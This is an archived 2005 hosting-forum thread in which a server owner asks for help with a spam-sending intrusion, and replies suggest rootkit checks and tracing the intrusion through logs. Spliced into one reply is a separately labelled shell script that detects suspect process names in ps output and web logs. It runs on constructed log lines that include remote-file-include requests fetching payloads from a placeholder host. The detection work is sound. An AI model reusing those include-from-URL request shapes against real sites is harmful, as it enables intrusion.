Web Hosting Talk

Web Hosting Talk (http://www.webhostingtalk.com/index.php)
-   Hosting Security and Technology (http://www.webhostingtalk.com/forumdisplay.php?f=5)
-   -   server compromised? (http://www.webhostingtalk.com/showthread.php?t=454075)


lkbryant 10-20-2005 05:02 PM

server compromised?
 
Hi, I have the following showing up in my ps:

- r0nin
- bindz
- bd

Hmm, I'm running RHEL and it seems someone is using my server to send spam mails.

I have a lot of load going to exim on my server; most of it seems to be targeting Brazil...

Any help or advice is greatly appreciated, ASAP.

Thank you.

lkbryant 10-20-2005 05:29 PM

Here is part of the exim process list:

root 23186 0.1 0.3 9028 3296 ? S 13:29 0:00 /usr/sbin/exim -Mc 1ESh2s-00061w-HR
mail 23190 0.0 0.3 9028 3344 ? S 13:29 0:00 \_ /usr/sbin/exim -Mc 1ESh2s-00061w-HR
root 24288 0.1 0.3 9032 3296 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
mail 24290 0.0 0.3 9032 3332 ? S 13:31 0:00 \_ /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
root 24359 0.5 0.3 9032 3292 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
mail 24364 0.0 0.3 9044 3384 ? S 13:31 0:00 \_ /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
root 24676 0.6 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
mail 24677 0.6 0.3 9032 3312 ? S 13:31 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
root 24760 0.5 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-DO
mail 24764 0.1 0.3 9032 3308 ? S 13:31 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-D
root 24864 2.1 0.3 8908 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
mail 24867 0.1 0.3 9036 3320 ? S 13:32 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
root 24925 1.6 0.3 8900 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
mail 24929 0.0 0.3 9028 3312 ? S 13:32 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
root 24932 2.1 0.3 9024 3292 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail 24962 1.6 0.3 9024 3336 ? S 13:32 0:00 \_ /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail 25020 14.0 0.3 9032 3348 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5B-0006VW-Qi
mail 25037 0.0 0.1 6584 1852 ? R 13:32 0:00 \_ /usr/sbin/exim -t -oem -oi -f <> -E1ESh5B-0006VW-Qi
root 25032 0.0 0.3 9028 3296 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB
mail 25036 0.0 0.3 9028 3336 ? R 13:32 0:00 \_ /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB

hiryuu 10-20-2005 05:58 PM

Wipe the server. Hire an admin. This round is over.

omicronpersei8 10-20-2005 05:59 PM

Looks like a typical vulnerable web script compromise. Are all those processes running as the apache user?

If this is a shared/cPanel box, grep for these binary names in /usr/local/apache/domlogs and try to locate the virtual host they came in by, which should lead you to the bug (most likely a PHP-based forum or CMS).


This script will help you detect these type of attacks next time.
http://www.thunkers.net/~navs/public/nobody-knows.sh
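As an added example (not part of the original thread and not the nobody-knows.sh script linked above), here is a small POSIX sh script that does the two checks omicronpersei8 describes: list which user owns any process whose command name is one of the three names from the first post, then grep every domlog for those names and report the virtual host(s) whose log mentions them. The ps snapshot, the domlog file names, the IPs and the request paths below are constructed so the script runs offline; on a real cPanel box you would feed it `ps -eo user,pid,comm,args --no-headers` and point it at /usr/local/apache/domlogs instead.

```shell
#!/bin/sh
# Added example: locate the suspect binaries in ps output and in Apache domlogs.
# Everything marked "constructed" is sample data, not from the original post.

SUSPECT_NAMES="r0nin bindz bd"

# Constructed sample of `ps -eo user,pid,comm,args --no-headers`.
SAMPLE_PS='root 1 init /sbin/init
nobody 2231 httpd /usr/local/apache/bin/httpd -DSSL
nobody 25501 r0nin ./r0nin
nobody 25502 bindz ./bindz 6666
nobody 25503 bd /tmp/.x/bd
mail 25020 exim /usr/sbin/exim -Mc 1ESh5B-0006VW-Qi'

# Reads ps output (user pid comm args) on stdin and prints "user pid comm" for
# every process whose command name is exactly one of the suspect names.
find_suspect_procs() {
  awk -v names="$SUSPECT_NAMES" '
    BEGIN { n = split(names, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
    ($3 in bad) { print $1, $2, $3 }'
}

# Distinct users running suspect processes: answers "is it all the apache user?"
suspect_users() {
  find_suspect_procs | awk '{ print $1 }' | sort -u
}

# Creates a constructed domlogs directory with two vhost logs and prints its path.
# forum.example.com shows a remote-file-include style fetch of two of the binaries;
# shop.example.com is clean (note "bdlogo.png" must NOT count as a hit for "bd").
make_sample_domlogs() {
  d=$(mktemp -d)
  cat > "$d/forum.example.com" <<'EOF'
203.0.113.5 - - [20/Oct/2005:13:25:01 -0400] "GET /forum/index.php?inc=http://198.51.100.7/bindz HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [20/Oct/2005:13:25:09 -0400] "GET /forum/index.php?inc=http://198.51.100.7/r0nin HTTP/1.1" 200 488 "-" "Mozilla/4.0"
203.0.113.5 - - [20/Oct/2005:13:26:40 -0400] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 8812 "-" "Mozilla/4.0"
EOF
  cat > "$d/shop.example.com" <<'EOF'
198.51.100.20 - - [20/Oct/2005:13:20:11 -0400] "GET /index.php HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
198.51.100.20 - - [20/Oct/2005:13:20:15 -0400] "GET /images/bdlogo.png HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
EOF
  echo "$d"
}

# $1 = domlogs directory. Prints "<vhost log> <matching line count>" for each
# log that mentions any suspect name as a whole word (-w keeps "bd" from
# matching inside unrelated names such as bdlogo.png).
find_domlog_hits() {
  dir=$1
  pattern=$(printf '%s' "$SUSPECT_NAMES" | tr ' ' '|')
  for f in "$dir"/*; do
    [ -f "$f" ] || continue
    n=$(grep -c -w -E "$pattern" "$f" || true)
    if [ "$n" -gt 0 ]; then
      echo "$(basename "$f") $n"
    fi
  done
}

# Demo run on the constructed samples. On a live box replace the two inputs with:
#   ps -eo user,pid,comm,args --no-headers | find_suspect_procs
#   find_domlog_hits /usr/local/apache/domlogs
printf '%s\n' "$SAMPLE_PS" | find_suspect_procs
printf '%s\n' "$SAMPLE_PS" | suspect_users
demo_dir=$(make_sample_domlogs)
find_domlog_hits "$demo_dir"
rm -rf "$demo_dir"
```

The vhost whose log lights up is where to start reading for the injection (the `?inc=http://...` shape in the constructed lines is the classic include-from-URL pattern in old PHP forums and CMSes); the user column tells you whether the intruder is still confined to the web server account or has moved beyond it.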

Eleven2 Hosting 10-20-2005 06:33 PM

Check out this guide here: http://www.eth0.us/hacked

eth00 has some very good guides about everything!

sehe 10-21-2005 12:50 PM

Run chkrootkit from http://www.chkrootkit.org/ and rkhunter from http://www.rootkit.nl/projects/rootkit_hunter.html.
If it's not a root compromise, there should not be a need for a reinstall.

eth00 10-21-2005 01:01 PM

Quote:

Originally posted by sehe
Run chkrootkit from http://www.chkrootkit.org/ and rkhunter from http://www.rootkit.nl/projects/rootkit_hunter.html.
If it's not a root compromise, there should not be a need for a reinstall.

There are some rootkits that cannot be detected by those methods. I would be VERY cautious, since he has root-owned files he did not create AND he changed root passwords but they are still being created. There is something weird going on, and he will most likely need to take a while to investigate it or just reimage.

lkbryant 10-21-2005 02:14 PM

How much would one charge for complete protection of my server from this point?

Eleven2 Hosting 10-21-2005 02:17 PM

I would recommend you contact someone like www.totalservesolutions.com. I have used them and they are quite good!

sehe 10-21-2005 05:01 PM

Quote:

Originally posted by eth00
There are some rootkits that cannot be detected by those methods.

Won't object.

Quote:

I would be VERY cautious, since he has root-owned files he did not create AND he changed root passwords but they are still being created.

You got more info about the incident? Didn't see that part posted.

